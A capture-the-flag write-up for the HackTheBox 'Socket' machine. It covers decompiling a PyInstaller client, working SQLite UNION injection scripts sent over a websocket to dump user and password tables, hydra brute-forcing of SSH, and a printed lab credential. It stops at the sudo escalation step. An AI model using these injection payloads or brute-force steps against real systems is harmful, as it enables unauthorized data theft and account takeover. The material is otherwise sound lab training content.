➜ ~

Playing Hacks and Stuffs!

Project maintained by h4ckyou Hosted on GitHub Pages — Theme by mattgraham

Socket HackTheBox

Difficulty = Medium

IP Address = 10.129.192.218

Nmap Scan image

I added the domain to my /etc/hosts/ file

After checking the web server image

The only function there is that it checks converts a string to a qr code or it decodes a qr code and shows it content

THere’s a given file which can be downloaded image

After downloading the file given which turns out to be a zip file i extracted it image

And its looks like a python compiled binary

So we can decompile it using uncompyle6 but before that we need to convert it to a pyc file

pyi-archive_viewer qreader
? X qreader
to filename? ./qreader.pyc

Then decompile using uncompyle6

uncompyle6 qreader.pyc > qreader.py

I encountered issues with this because it works with python3.8 and ever since i updated my linux its been misbehaving

So i used vps (thm attack box) for this image

Here’s the vulnerable part of the code

...
ws_host = 'ws://ws.qreader.htb:5789'
...
    def version(self):
        response = asyncio.run(ws_connect(ws_host + '/version', json.dumps({
            'version': VERSION })))
        data = json.loads(response)
        if 'error' not in data.keys():
            version_info = data['message']
            msg = f'''[INFO] You have version {version_info['version']} which was released on {version_info['released_date']}'''
            self.statusBar().showMessage(msg)
            return None
        error = None['error']
        self.statusBar().showMessage(error)
...

It calls to the web socket hosted on port 5789 and sends the value of version in json format to the /version endpoint

After meeting chatgpt for a script to connect to the ws socket it formed this

from websocket import *
import sys, json

ws_host = 'ws://ws.qreader.htb:5789'

VERSION = '0.0.2'

ws = create_connection(ws_host + '/version')
ws.send(json.dumps({'version': VERSION}))
result = ws.recv()
print(result)
ws.close()

Trying that works

➜  Socket python3.10 connect.py
{"message": {"id": 2, "version": "0.0.2", "released_date": "26/09/2022", "downloads": 720}}
➜  Socket

From here the best thing to try i guess is sql injection

I followed Resource and got that its sqlite injection

From there i got the user table and password table

Here’s the script

from websocket import *
import sys, json

ws_host = 'ws://ws.qreader.htb:5789'

VERSION = '0.0.3" UNION SELECT username,password,3,4 from users-- -'

ws = create_connection(ws_host + '/version')
ws.send(json.dumps({'version': VERSION}))
result = ws.recv()
print(result)
ws.close()


VERSION = '0.0.3" UNION SELECT group_concat(answered_by),group_concat(answer),3,4 from answers-- -'

ws = create_connection(ws_host + '/version')
ws.send(json.dumps({'version': VERSION}))
result = ws.recv()
print(result)
ws.close()

Running that gives the password hash and a user image

Using crackstation i got the password value for the hash image

Now we have password how about user?

If you notice the name Thomas Keller we can try get like possible usernames from it

Using a Script, I generated possible usernames image

So i then used hydra to brute force usernames for ssh image

Now that we have valid cred tkeller:denjanjade122566 lets login to ssh image

Lets get root

Checking sudo -l shows that the user can run /usr/local/sbin/build-installer.sh as root image

Here’s the content of /usr/local/sbin/build-installer.sh image